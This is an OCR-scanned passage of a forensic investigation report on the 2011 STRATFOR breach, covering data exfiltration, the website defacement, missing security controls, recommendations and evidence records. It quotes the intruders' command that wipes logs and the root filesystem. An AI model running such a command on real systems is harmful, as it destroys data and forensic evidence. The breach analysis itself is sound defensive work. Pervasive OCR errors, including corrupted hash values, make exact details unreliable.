12/17/2011 07 24 05 


12/17/2011 07 27 20 






2 


12/17/2011 06 03 28 


12/17/2011 06 04 28 



Tabie 5.5.3.2 - IP Addresses Associated with Unauthorized Access via ''z.]sp'' to Zimbra Ssver 
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5.6. Netlntel Analysis 

Due to the lack ot network log fifes on ttie in-scope systems, Verizon Business anaiyzed the internet 
traffic traversing the STRATFOR environment in order to gain an understanding of ffie internet activity for 
STRATFOR's systems in the montfis ieading up to and during tfie data breach event. Normally in a data 
breach investigation network log files provide an audit trail that can be used to differentiate between 
normal business and malicious activity. The analysis of Internet traffic can provide information similar to 
that of Network logs in that it also provides an audit trail that can be used to understand tfie activity of the 
systems in STRATFOR's environment. This type of traffic analysis (collectively called Netlntel) allows 
Verizon Business to analyze Internet traffic patterns and trends to determine what constitutes normal 
internet traffic and what is anomalous or potentially malicious traffic. 

Verizon Business began their analysis of STRATFOR's Internet traffic by first focusing on the data sent 
over high numbered and non-standard ports (as confirmed upon by STRATFOR personnel) and then 
sorting it by the amount of traffic passing through their environment info bytes per day. As shown in the 
figure below, there are two days in particular for which there was an abnormally large amount of data 
traversing the STRATFOR environment reflected in the Netlntel data. 
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Figure 5.6.1 - Bytes per Day 



Based on the data in the figure above, the first date of significance is December 5, 2011. Verizon 
Business then took the data for the date in question and sorted it to determine which IP addresses were 
transferring the highest amount of data out of the STRATFOR environment. The graph below depicts the 
sum of data leaving the STRATFOR environment (in bytes) on the date of December 5, 201 1 based upon 
destination IP address. Some of the IP addresses in the graph below have been redacted due to an 
ongoing Law Enforcement Investigation. 
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Bytes sent from STRATFOR on Dec 5, 2011 
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Figure 5.6.2 - Bytes leaving the STRATFOR environment on December 5, 201 1 

Further analysis of the Nellnlel data provided the following facts. Starting at approximately 4:37 p.m. 
CST on December 5, 2011, an abnormally high amount of data Is sent from the STRATFOR environment 
to the IP address ^^^^^^^H. The data transfer lasts for approximately 9 minutes, and concludes at 
4:46 p.m. CST. More Importantly, the data transfer occurred over port 9583 to a destination port of 
41216. Interviews with STRATFOR personnel confirm that this is a non-standard and unasslgned port for 
use In their environment. It is Important to note that Intruders often use custom assigned high and non- 
standard port numbers to obfuscate unauthorized data transfers out of victim environments. For 
example, attackers will frequently use high and non-standard ports for FTP and SSH traffic (Instead of 
their standard ports of 20 and 22 respectively) to throw off Investigators looking for traffic along standard 
ports. 

The other date of significance In the "Bytes per Day'' graph Is December 7, 2011. Once again Verizon 
Business then took the data for the date In question and sorted it to determine which IP addresses were 
transferring the highest amount of data out of the STRATFOR environment. The graph below depicts the 
sum of data leaving the STRATFOR environment (in bytes) on the date of December 7, 201 1 based upon 
IP address. Some of the IP addresses In the graph below have been redacted due to an ongoing Law 
Enforcement Investigation. 
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Bytes Sent From STRATFOK on Dec 7, 2011 
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Figure 5.6.3 - Bytes Leaving the STRATFOR Environment on December 7^ 201 1 



Verizon Business discovered a second abnormally high amount of data being sent from the STRATFOR 
environment to the IP address^^^^^^H, in Greece. The data transfer occurred over port 59630 to a 
destination port of 47608 for a time period of over 2 hours, approximateiy between the times of 9:37 a.m. 
and 11:47 a.m. GST on December 7, 2011. Once again, STRATFOR personnei vaiidated that these 
ports were not used for any standard or company sanctioned traffic. These iP addresses have been 
forwarded to the FBI for purposes of their investigation. 



It is important to note that these traffic anomaiies do not necessariiy refiect a crime-in-motion, but it might 
be indicative of other non-iegitimate activities unreiated to the data breach event. For exampie, an 
internai STRATFOR employee utilizing a torrent client for the purposes of file sharing might generate a 
similar traffic signature with high volume outbound traffic over high, non-standard ports. 

Analysis of the Zimbra mail server provided Verizon Business with evidence that the intruder(s) created 
the database dump file (which was later exfiltrated from the STRATFOR environment) on November 16, 
2011. The database dump finished at approximately 4:21 p.m. C3T. Verizon Business discovered log 
data showing the user "ngeron" logging into the database server at 3:35 pm GST. An excerpt of that iog 
data is provided in the figure below. 
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Figure 5.6.4 - Log Data Identifying User "ngeron'' Logging into the Database Server 



Further analysis of the Netlnlel data from STRATFOR's environment on November 16, 2011 led Verizon 
Business to discover an IP address, MHB, starting an interactive session with the 3TRATFOR 
oftice environment at 3:26 p.m. CST. This occurs shortly before tl^e user '^ngeron'^ SSHs into the 
database server and approximately 55 minutes before the database dump finished at 4:21 p.m. CST. 

Based upon interviews with Mr. Geron this would seem to be a valid session as part of the normal 
requirements of his position at 3TRATFOR was to create database dump files. However, the timing of 
this session seems suspicious due to the short amount of time between when the IP address above 
began a session with a system in the STRATFOR environment and when the user "ngeron'' logged into 
the database server'^. 



Verizon Netlntd should nol be consjdered ail-inclusive, as packets that do not traverse Verizon owned devices between Iheir 
source and destination addresses would not be encapsulated in the dalaset under analysis. 
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5.7. Damage Assessment 

During the course o1 the attack against STRAFOR's systems, the intruder's primary targets were payment 
related and e-maii related systems. Once the intruder(s) gained access to the STRATFOR environment 
they exfiitrated a database dump file containing credit card information and Personal Identifiable 
information (Pll), This information included, but was not limited to, name, e-mail address, primary 
account number (PAN), expiration date, and CVC2/CVV2. In addition to tfie database dump file, the 
intruder(s) were also successful in exfiltrating data contained on STRATFOR's e-mail servers. This data 
included confidential communications between STRATFOR personnel and customers, clients, and/or 
contacts. 



After successfully exfiltrating the data noted above, the intruder(s) defaced the www.3TRATF0R.com 
website on December 24, 201 1 . The defacement modified the visuals of the STRATFOR website splash 
page, A portion of the modiffed website is incfuded in the screenshot below. 
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Figure 5.7.1 - Website Defacement 
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At the top of ttie page is an embedded video glorifying the hacker group Anonymous. This video can be 
viewed oniine. Beiowthe video is the text "// MERRY LUi^XMAS! ARE YOU READY FOR A WEEK OF 
MAYHEM? hOhOhOhOhO" and a link to connect to the IRC server "irc.anonops.li" via a Web based Iront- 
end- 

The defacement included the contents of the Web server's shadow fiie. The shadow fiie is a Linux fiie 
that contains information such as usernames, encrypted passwords, and additional properties related to 
the user passwords. After describing the deletion procedure, the defacement Web page contained 
responses and criticism to four internal e-mail messages compromised by the attackers from the 
STRATFOR environment, signifying that the attackers obtained STRATFOR's email messages. 

Investigators ran keyword searches on the acquired forensic images and were able to identify remnants 
of all four of these messages on the STRATFOR Zimbra and SMTP servers. Also included in the 
defacement was personal information associated to STRATFOR's IT manager at the time Frank Ginac, 
portions of text from The Coming Insurrection" a French work influential in the anarchist community, and 
command fine text showing the intruder(s) running the Unix ''rm -rT command against the A/ar/log 
directory as well as the root directory of the Web server. That portion of the defacement is included in the 
screenshot below. 



# nn -rf /var/log/* fi; rm -rf /* G; 

rmi cannot rei&ovs directory ^ /dev/shm' i Dftvica or raaource busy 

rmi cannot raakova ^ /dev/pts/I ' t Operation not permitted 

rmt cannot remove directory " /lost+found ' ; Directory not en^ty 

# id 

/bin/baehi line 19: /uflr/bin/id: Ho fluch file or directory 

# PB 

/bin/baeht line 22 1 pa i comnLand not found 

rmi cannot remove "/proc/ide/hdb* i Operation not permitted 

rmt cannot remove "/proc/ide/ideO/hdb/capacity ' j Operation not permitted 

rmt cannot remove " /proc/idB/ideO/hdb/aattings ' t Operation not permitted 



Figure 5,7.2 - Website defacement showing the use of the ' rm -rf" command 

In addition to running the Unix "rm -rT command on the Web and database servers the intruder(s) also 
issued this command to two separate e-mail servers within the STRATFOR environment. The result of 
running this command was that the contents of nearly every writable mounted file system on the servers 
was deleted, up until the point that the server itself crashed as system-critical files and directories were 
deleted. 
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5.8. Potential Vulnerabilities 

In light of a confirmed system breacti, It stiould be noted that several distinct vulnerabilities and network 
configurations existed that allowed this breach and subsequent data compromise to occur. The fact that 
the STRATFOR database, ZImbra, SMTP, and Web servers were Internet facing and remotely accessible 
contributed to the occurrence of this data breach. Another significant factor is that the e-commerce 
environment was accessible from anywhere within the STRATFOR enterprise, as well as from the 
Internet directly. No firewall configuration existed for these Internet facing systems at the time of the 
breach. Therefore there was nothing In place to restrict remote access to specific and trusted IP 
addresses to the e-commerce environment as well as the SMTP and ZImbra servers within the 
STRATFOR DMZ. The firewall implementation In place on the office portion of the network did not retain 
sufficient log data therefore no meaningful firewall log analysis could be performed. No software firewalls 
were active or enabled on any of the examined systems. 

Several potential vulnerabilities related to account credentials were observed throughout this 
investigation. It should be noted that a password management policy does not exist within STRATFOR. 
Several unused accounts were present on each of the examined systems. These types of accounts are 
often exploited by attackers during data breach scenarios. Additionally, it was described to Verizon 
Business that the ''autobot'' account is shared and used by several users. Such practice should be 
avoided as it prevents user activity to be correlated to a specific individual in the event of a security 
Incident. No measure exists to prevent users from using the same password to access company email or 
corporate workstations as to remotely access servers containing sensitive information. 

Based on file system analysis and interviews with STRATFOR IT personnel, it has been determined that 
no anti-virus solution had been deployed on any of the examined systems. Lacking in an up to date, 
properly configured, anti-virus solution, especially for systems connected to the Internet, leaves them 
wide open to not only the more sophisticated and customized hacker attempts, but also to other viruses. 
An installed anti-virus solution is a necessary measure to guard against both internal and external attacks 
against any environment with computer systems. 

Review of patch levels associated with the Red Hat Linux operating system on the examined systems 
revealed that all systems with access to sensitive information were significantly outdated. Operating 
system level patches address security issues and potential vulnerabilities in the operating system that can 
be exploited. Although no available evidence suggests that the Red Hat Linux operating systems were 
exploited in this breach, it is recommended that STRATFOR review and apply the most recent operating 
system updates from Red Hat at a minimum on a monthly basis. 

During interviews while on-site with STRATFOR IT personnel, it was described to Verizon Business that 
STRATFOR never ran any type of vulnerability assessment or penetration tests on their environment. It 
is recommended that vulnerability scans and penetration tests be run quarterly to address any vulnerable 
code that exists on systems with access to sensitive information. Although Verizon Business could not 
confirm based on the available evidence. If vulnerable code was exploited, regular vulnerability scanning 
and penetration tests could have prevented this breach in the event that the malicious scripts executed by 
the attacker were part of a vulnerable Web application in use at STRATFOR. 
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5.9. Security Posture 

In terms of host-level security, none of the other examined systems had an anti-virus solution present. 
Based on the available evidence, It cannot be determined if an up-to-date anti-virus solution would have 
prevented this data compromise as It is suspected that a breach may have taken place on the office 
network portion of the 3TRATFOR enterprise. Unfortunately the majority of systems in the 3TRATFOR 
office environment were rebuilt prior to Verizon Business' involvement In this Investigation. 

The absence of any real measure of File Integrity Monitoring (FIM) Inside the environment allowed the 
attacker(s) to write files to the system. A properly configured FIM solution would have alerted 
STRATFOR personnel as soon as the Intruder(s) attempted to compress the STRATFOR e-commerce 
and e-mail databases to intermediate files which were later exfiltrated and subsequently deleted. 

At the time of suspected breach, remote access via SSH from the Internet was not restricted by a firewall 
configuration to any of STRATFOR's Internet facing servers. As such, these servers were accessible 
directly from any system within STRATFOR's office network as well. Additionally, outbound Internet 
access on the examined systems was not restricted. 

A password management policy does not exist within STRATFOR. User account passwords are shared 
between users at times, and no policy prevents STRATFOR employees from using the same passwords 
for multiple systems/devices. Users commonly use the same password to access email as the password 
to remotely access a system containing sensitive information. 

The firewall in place on the office portion of the STRATFOR network at the time of suspected breach 
was not configured to retain log data using a logging server therefore no firewall log data was available 
for this investigation. Although this firewall had to capability to retain valuable firewall log data, It was not 
properly configured to do so by STRATFOR. 
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5.10. Network Modifications 

In light o1 the events surrounding this data breach, STRATFOR moved to make several Immediate and 
long-term changes to their network environment. The purpose of these measures is to prevent similar 
attacks from occurring again in the future. These network modifications included simple configuration 
changes, as well as additional network appliances/components and system rebuilds. A summary of the 
network modifications taken by STRATFOR Is Included below: 

• 12^6^011 and Ongoing - On December 24, 2011 unauthorized Intruders successfully defaced 
the www.3TRATFOR.com website and shortly thereafter disabled the Web server and two 
separate mall servers using the Unix command ^rm -rf" as a superuser In the root directory. This 
caused the contents of nearly every writable mounted file system on the servers to be deleted. 
Due to the deletion of these systems, STRATFOR was forced to completely rebuild their 
environment. In order to accomplish this, STRATFOR is working alongside a third-party security 
firm to completely rebuild their website, e-mall system, and Internal infrastructure. 

• 1Z^6j^011 - During the course of the Investigation, It was discovered that the Intruder(s) had 
accessed multiple systems within the STRATFOR environment, altered files, and accessed the 
database with the intention of capturing sensitive credit card data (among other data elements). 
As such, STRATFOR no longer trusted internal systems to be as secure as possible. As such, 
STRATFOR decided to fully rebuild all of their office systems up to and Including end-user 
employee workstations. Verizon Business fully concurs with STRATFOR's decision In this regard 
and recommends that this process involve adequate testing to ensure the new system builds 
meet the required security baseline standards. 

• 12/26/2011 - Immediately upon the realization that the Intruder(s) were able to log Into the 
STRATFOR environment using compromised user credentials, STRATFOR Initiated new 
password requirements and have enhanced the encryption and storage of said passwords. 

• 12/26/2011 - STRATFOR has Implemented a firewall for their e-commerce environment and 
modified the existing firewalls governing their oftlce portion of the environment. STRATFOR has 
enabled the full collection and retention of firewall logs as well as Implemented an ACL (Access 
Control List) in both the e-commerce and office portions of the environment. In addition to these 
modifications, STRATFOR has also modified the firewall to their office environment such that only 
the mall and VPN ports are currently active. 

• 12/26/2011 and Ongoing - The lack of relevant network logging data for the STRATFOR 
environment hampered the Investigation of the data breach. Realizing this, STRATFOR Is now 
retaining network logging data and monitoring for IP addresses discovered during the 
Investigation and known to be malicious. STRATFOR Is also working on Implementing a Security 
Information and Event Management (SIEM) tool to aggregate log data into a centralized 
repository where It can be monitored and analyzed for abnormalities. 

• Ongoing - As of the writing of this report, STRATFOR Is currently working on moving the entire 
e-commerce portion of their systems to a highly secure, PCI compliant third-party system, thereby 
eliminating the need to store credit card Infomiatlon on their systems. This remediation measure 
Is currently ongoing and has not been confirmed by Verizon Business, 
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5.11. Threat-Specific Data 

Specilic IP addresses and Entity intormation included in this section are redacted due to and ongoing FBI 
investigation into this data breach event. However, specitic remarks are included to detail each the 
involvement of each IP address with this case. 



IP Address 



Remarks 











Massachusetts 


This IP address was discovered to have remotely 
accessed the STRATFOR network via 3SH without 
authorization. Additionally, unauthorized scripts were run 
on STRATFOR systems from this IP address 


Florida 


Relative to the IP address noted above, this IP address 
was discovered among command line syntax used to mn 
unknown scripts within the STRATFOR environment. 
Specifically, this IP address was designated to receive 
the piped output of the script initially mn by the IP 
address above. 


Greece 


Based on Netlntel analysis, this IP address was 
observed as receiving an unusually high volume of data 
from the STRATFOR office environment over high and 
non-standard ports on December 7, 201 1 . 


New York 


Based on Netlntel analysis, this IP address was 
observed as receiving an unusually high volume of data 
from the STRATFOR office environment over high and 
non-standard ports on December 5, 201 1 . 


Calitomia 


This IP address is suspected of entering a remote 
session with the STRATFOR environment in the 
moments leading up the creation of the MySQL database 
dump file on November 16, 2011. 
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the Zimbra mail server to remotely Issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
scripL 
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the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
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TOR 


This IP address directly manipulated the "^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
scripL 


France 


This IP address directly manipulated the '^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
script. 


TOR 


This IP address directly manipulated the "^z.jsp" script on 
the Zimbra mail server to remotely issue Linux 
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commands to the affected system. Due to the nature ot 
the system, Verizon was not able to directly analyze this 
script. 








TOR 


This IP address directly manipulated the "^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the atfected system. Due to the nature ot 
the system, Verizon was not able to directly analyze this 
script. 




Ukraine 


This IP address directly manipulated the "z.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the aflected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
script. 




Sweden 


This IP address directly manipulated the "^z.jsp" script on 
the Zimbra mail server to remotely Issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
scripL 




Sweden 


This IP address directly manipulated the "^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
scripL 




TOR 


This IP address directly manipulated the '^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the atfected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
script. 




TOR 


This IP address directly manipulated the "^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
script. 




Norway 


This IP address directly manipulated the "^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
script. 






Netherlands 


This IP address directly manipulated the "^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
scripL 




University ot Tilburg 
Netherlands 


This IP address directly manipulated the "^.jsp" script on 
the Zimbra mail server to remotely issue Linux 
commands to the affected system. Due to the nature of 
the system, Verizon was not able to directly analyze this 
scripL 




United States 


This IP address is noted as the one from which the 
malicious "db_con.php" script was downloaded to the 
Web server. 



Table 5.11 .1 - Malicious IP Address 
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6. Compromised Entity Containment Plan 



This section highlights corrective measures already in piace or in progress within STRATFOR. Several 
initiatives involving enhancements to ttie existing security and access controls within the STRATFOR 
environment have been put in place during the investigation. These initiatives should serve to reinforce 
the security measures already in place wittiin ttie STRATFOR environment. It is critical to shed light on 
these corrective measures as ttiese tiave a direct bearing on Verizon Business' recommendations 
outlined in the next section of the report. These containment measures have not verified by Verizon 
Business. 

Rebuilding or Replacing All STRATFOR Systems 

In ligtit of the significance of this data breach, STRATFOR made the decision to rebuild or replace every 
system wittiin ttie enterprise. STRATFOR has rebuilt the affected servers and devised a strategy to roll 
them out with a development plan involving vulnerability scanning and penetration tests. Additionally, all 
employee workstations were either rebuilt, or replaced on new hardware. 

Configuring Proper Firewalls 

STRATFOR tias deployed redundant Cisco ASA firewalls to protect ttie back-end servers compromised 
during ttiis data breach. These firewalls were configured with strict access controls and proper log data 
retention. Additionally, new firewalls were rolled out onto the office portion of the network to protect 
employee workstations. 

Employing a Third-Party Security Consultant Firm 

In ttie aftermath of this investigation, STRATFOR has devised a plan to employ a third party security 
consultant firm to assist in strengthening the security posture of ttie organization and assist in addressing 
the recommendations provided by Verizon Business in the next section of this report. 
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7, 



Recommendations 



In order to reduce the risk of sensitive data compromise from any potential breacti point wittiin ttie 
STIWTFOR environment in ttie future, several recommendations stiouid be considered. Ttie 
recommendations discussed in ttiis section encompass enhancements to the incident response policies 
and procedures that protect the organization and their clients. By implementing ttiese recommendations, 
STRATFOR will reduce the risk of exposure both from malicious intruders, as well as potential insiders. If 
stiouid be noted that as a consequence of ttie events affecting STRATFOR systems, ftie organization is 
working to rebuild all affected systems from the ground up. Verizon fully concurs with STRATFOR's 
decision to fully rebuild all affected systems using trusted operating system image sources. 

Regularly Audit Data Structures - Verizon recommends ttiat all integral STRATFOR systems and 
servers that process, store, or transmit any and all sensitive or proprietary data stiouid be reviewed 
periodically for old and/or stale content and data structures. The proactive and prohibitive removal of 
these types of sensitive or proprietary data where unnecessary prior to any potential unauthorized remote 
access would tielp to curb ttie possibility of compromise of this data. Unknown content such as this can 
often be overlooked, but yet present the same level of risk as that of active and recent content. A 
common methodology to address ttiis is to institute regimented data discovery exercises to fully 
enumerate and inventory data types stored across systems wittiin a network environment. Such data 
discovery exercises should take place at least annually, if not quarterly. 

Render Sensitive Data Unreadable - Ideally, any organization should limit the retention of sensitive data 
to only that which is absolutely necessary. Additionally, all sensitive data stiouid be encrypted wherever it 
is stored. Verizon recommends ttiat STRATFOR, if they tiave not done so already, immediately remove 
any and all cardholder information resident wittiin the database server. For any further production 
systems wtiose sensitive data is routinely accessed, any stored information should immediately be 
encrypted or otherwise rendered unreadable. If stiouid be noted the most effective defense against 
unnecessary application-based data retention is to perform application code reviews prior to an 
application being placed into production. Proper application testing would effectively determine the risk 
associated witfi sucfi practices and design to remove it. 

Proper Network Segmentation - As noted throughout this report, during the course of the investigation, 
specific problems with the current corporate/productions network architecture and segregation from the 
payment environment were highlighter. Once having examined and described tfie current network 
configuration, it became clear that as the network existed during tfie time of the breach, users from the 
office environment could access systems inside the production e-commerce environment unfettered. 
There was no segregation by means of a stateful packet inspection firewall between the office 
environment and the payment related environment. Verizon recommends tfiat tfiis particular facet of the 
STRATFOR network environment is called out, remediated, and validated during the next available 
auditing opportunity. As STRATFOR is completely outsourcing is payment processing functions, this 
point may become moot relative to the protection of cardholder data. However, it should also be noted 
that the Web server environment would still retain a measure of Intellectual Property and proprietary data 
that would require similar strengthening in network segregation. 
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Deploy an Intrusion Detection System/Intrusion Prevention System - In response to the events tied 
to this investigation, STRATFOR should consider implementing an IDS/iPS solution to act as a defense 
ioT both the www.STRATFOR.com as well as the otfice systems environments. Currently, no such 
solution exists within the STRATFOR environment. In this particular environment, a properly tuned 
IDS/IPS should alert security personnel during any instance that an intruder initiated an attack or data 
exfiltration against the environment. Additionally, an IDS/iPS solution may be able to shed light on 
breach points no considered under the current security regimen. Moreover, a properly configured 
iDS/IPS, with the personnel manpower to maintain and monitor it, is a key component to many regulatory 
compliance requirements and industry best practices including the PCI-DSS. 

Deploy Security information and Event Manager Soiution (SiEM) - As an essential component of any 
network security regimen, systems and network logs provide incident response personnel the ability to 
identify, analyze, diagnose, and mitigate any anomalous network traffic. In the aftermath of a data 
breach, logs often contain data critical to a subsequent forensics investigation. However, in conducting 
Its investigation, Verizon discovered that many critical system logs were not collected and aggregated 
through a central log management appliance (system logs were stored at the systems of origin - many of 
which were destroyed by the intruders). Firewall logs were not retained at all. Verizon recommends that 
STRATFOR increase logging on all network witness devices, such as firewalls, production servers, and 
remote access session logs. Ideally, these logs would maintain a level of verbosity that would allow 
individual accesses to be tied to specific employees and workstations at the perimeter. Logs should also 
be saved and aggregated to a separate location through a proper Security Information and Event 
Management (SIEM) solution. Further, historical logs coming off of this SIEM for archival purposes 
should be on media that is not easily altered, such as optical media or an external storage device, and 
should be reviewed on a regular basis to quickly identify suspicious activity. A properly configured 
logging solution, with the personnel manpower to maintain and monitor it, is a key component to many 
regulatory compliance requirements and industry best practices including the PCI-DSS. 

Install a File Integrity Monitoring Solution - In terms of host-level security, the absence of any File 
Integrity Monitoring (FIM) inside the STRATFOR environment allowed the attacker(s) to introduce and run 
unauthorized code. A properly configured FIM solution with system level monitoring would have alerted 
security administrators as soon as the first unauthorized script was introduced into the STRATFOR 
environment. Verizon Business recommends that STRATFOR consider deploying a proper FIM solution 
within any systems environment routinely managing sensitive or proprietary data. Moreover, a properly 
configured FIM, with the personnel manpower to maintain and monitor it is a key component to PCI 
compliance. 

Routinely Audit the Access Control Lists (ACLs) - Verizon recommends that all Access Control Lists 
(ACLs) be reviewed periodically for old and/or stale permissions as well as to ensure that users have the 
correct permissions assigned to them. The proactive and prohibitive measure of reviewing the permitted 
networks assigned to each user can help curb unauthorized access to said networks within the 
STRATFOR environment. Specifically, during the course of this investigation Verizon learned that a 
specific user account was used by the intruders to access the STRATFOR web server via SSH. In 
Interviewing this particular employee, Verizon learned that he never maintained any business need to 
access that system. Routine auditing of such permissions would serve to reduce unnecessary access 
privileges across tfie environment. 
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Achieve and Maintain PCI Compliance - Although no security mandate is foolproof, Verizon 
recommends that 3TRATFOR take steps to achieve and maintain PCi compliance to sustain an effective 
security posture. Verizon recommendations that 3TRATFOR work to achieve the action items listed 
above in correlation with any corrective actions already taken or planned. Many of these measures are 
in-line with requirements as set forth by the most up-to-date PCI D3G in order to effectively mitigate the 
risks of network breach and cardholder data compromise. It should be noted that as 3TRATFOR is 
completely outsourcing is payment processing functions, the organization may not be directly required to 
adhere to PCI-D33 requirements. However, that is not to say that the security requirements set forth by 
PCI-D33 would be irrelevant to the organization. Rather, as 3TRATFOR retains a measure of sensitive 
and proprietary data, the security measures outlined in the PCI-D3S would very effectively work to curb 
the risk of any future data breach event. 
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8. PCI DSS Compliance Status 

This 'PCI DSS Compliance Status' is filled-out in accordance with the What To Do If Compromised,' Visa 
Inc. Fraud Control and Investigations Procedures, Version 2.0 (Global), effective February 2010. It is 
important to read each of these 12 requirements in conjunction with their associated sub-requirements. 
The information in tfiis table reflects tfie STRATFOR environment at the time of tfie breacfi event, and is 
not reflective of the current environment. 



Requirement 


Status 


Cause of 
Breach 




Build and Maintain a Secure Network 








Requirement 1 : Install and maintain a firewall 
configuration to protect data 


Not In Place 


Yes 


At tfie time of the 
breach and 
creation of the 
database dump 
file, there was no 
firewall in-place 
In front of the e- 
commerce 
environment. 
Additionally, the 
firewall 

implementation 
in front of the 
office 

environment did 
not effectively 
block high-port 
non-standard 
traffic. 


Requirement 2: Do not use vendor-supplied defaufts for 
system passwords and otfier security 
parameters 


In Place 


No 


There are no 

vendor-supplied 

default 

passwords in 

use within the 

STRATFOR 

environment. 


Protect Cardholder Data 




Requirement 3: Protect Stored Data 


Not In Piace 


Yes 


At the time of the 
breach, the 
affected 
STRATFOR 
server retained 
PAN, expiry, 
CVV2/CVC2, 
and customer 
address in plain, 
unencrypted 
text. 


Requirement 4: Encrypt transmission of cardhoider data 
and sensitive information across public 
networ1<s 


In Place 


No 


Card data was 
encrypted via 
SSL Into the 
STRATFOR 
environment as 
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well as to Ttie 
Bancorp Bank, 
tt^eir merctiant 
acquirer. 


Maintain a Vuln^BbiMty Managem^ Program 




Requirement 5: Use and regulariy update anti-virus 
software 


Not in Place 


No 


Examination ot 
in -scope 
evidence 
confirms that at 
the time of the 
breach 

STRATFORdid 
not maintain a 
standard and up- 
to-date security 

1 tjUII 1 Id 1. 


Requirement 6: Develop and mainlain secure systems 
and applications 


Not In Place 


Yes 


At the time of tfie 
breach. 
STRATFOR 
used an out of 
data version of 
the Ubercart 
shopping cart 
application as 
well as out-of- 
date, potentially 
vulnerable 
versions of SSH. 


Implement Strong Access Control Measures 




Requirement 7: Restrict access to data by busiriess 
need-to-know 


Not In Place 


Yes 


Atttie time of tfie 
breach, there 
was no 
segmentation 
between the 
payment 
environment and 
itie corporate 
environment that 
would restrict 
access to 
employees not 
needing it. 


Requirement 8: Assiqn a unique ID to eacti person witti 
computer access 


Not In Place 


Yes 


The account 
"autobot" was a 
shared account 
suspected to 
have been used 
by ttie attackers. 


data 


In Place 


No 


Physical access 
to systems in the 
cardholder 
environment was 
strictly controlled 
within a 
CoreNETdata 
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1 1 center. 


R^ularly Monitor and Test Networks 




Requirement 1 0: Track and monitor all access to network 
resources and cardholder data 


Not In Place 


Yes 


STRATFORdid 
not maintain a 
centralized and 
aggregated 
logging 
Information 
Management 
(SEIM) solution 
to track and 
monitor access 
to the cardfiolder 
environment. 


Requirement 11: Regularly test security systems and 

processes 


Not In Place 


Yes 


No File Integrity 
Monitoring 
processes or 
tools existed 
wittiin tfie 
STRATFOR 
environment in 
violation of sub- 
requirement 
1 1 .5, allowing 
the introduction 
and execution of 
unauthorized 
scripts to go 
undetected by 
system 

administrators. 


Maintain an Information Security Policy 




Requirement 1 2: Maintain a policy ttiat addresses 
information security 


Not In Place 


Yes 


At the time of the 
breach. 

STRATFORdid 
not maintain a 
standard 
information 
security policy to 
be distributed 
and understood 
among its 
employees. 
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Appendix A. Miscellaneous items 



A.i. Points of Contact 





STRATFOR 


Name 


Steve Feldhaus 


Title 


Legal Counsel 


Phone 






E-mail 






STRATFOR 


Name 


Fred Burton 


Title 


Director of Intelligence 


Phone 






E-mail 




1 Investigator 


Verizon Business 


Name 


J, Andrew Valentine 


Title 


Senior Consultant, Investigative Response 


Phone 










E-mail 




1 Investigator 


Verizon Business 


Name 


Rafael Perelstein 


Title 


Senior Consultant, Investigative Response 


Phone 




E-mail 


1 




1 Investigator 


Verizon Business 


Name 


Joseph Siiva 


Title 


Consultant, Investigative Response 


Phone 






E-mail 


1 





refl TOW tiusfngss 
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Appendix B. Evidence Collection 




B.I. Imaged System Details 






System 


Web server 






Date of Acquisition 


Januarys, 2012 






Volatile Data Captured? 


□ Yes 


Kl No 






Memory Captured? 


□ Yes 


^ No 






HDD MD5 Hash Value 


72BD55aB1 FBFFF4AF601 4A322EB46F0D 






System Function 


Web Server 






System (Computer) Name 








IP Address 














System 


Web server 






Date of Acquisition 


Januarys, 2012 






Volatile Data Captured? 


□ Yes 


Kl No 






Memory Captured? 


□ Yes 


E No 






HDD MD5 Hash Value 


C306EF68ED34B8393FEB89621C7D8703 






System Function 


Web Server mirror 
















System (Computer) Name 










IP Address 


























System 


Database Server 








Date of Acquisition 


January 05, 2012 






Volatile Data Captured? 


□ Yes 


S No 






Memory Captured? 


□ Yes 


B No 






HDD MD5 Hash Value 


4a7ae29327f488e07e593e69ebbe4652 






System Function 


Database Server 






System (Computer) Name 








IP Address 


























System 


Zimbra Mail Server 






Date of Acquisition 


December 31,2011 






Volatile Data Captured? 


□ Yes 


E No 






Memory Captured? 


□ Yes 


E No 














Page 55 of 66 



68671 



strategic Forecasting, Inc. - Computer Forensic Report 



HDD MD5 Hash Value 


73d820071 68a0dfe9e2631 1 b091 21 889 


System Function 


Zimbra Mail Server part 1 ot RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 




System 


Zimbra Mail Server 


Date of Acquisition 


December 31 , 201 1 


Volatile Data Captured? 


□ Yes 


E No 


Memory Captured? 


□ Yes 


H No 


HDD MD5 Hast! Value 


C044271 95cedb0461 1 Cl54b523dlf0f7 


System Function 


Zimbra Mail Server part 2 ot RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Zimbra Mail Server 


Date ot Acquisition 


December 31, 2011 


Volatile Data Captured? 


□ Yes 


El No 


Memory Captured? 


□ Yes 


H No 


HDD MD5 Hash Value 


3afca42d25ccb24ecl bl a51 2b0d6e378 


System Function 


Zimbra Mail Server part 3 ot RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Zimbra Mail Server 


Date of Acquisition 


December 31,2011 


Volatile Data Captured? 


□ Yes 


M No 


Memory Captured? 


□ Yes 


M No 


HDD MD5 Hash Value 


1 64d57751 7b01 35t3700fc35c8t6d77b 


System Function 


Zimbra Mail Server part 4 ot RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 
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1 System 
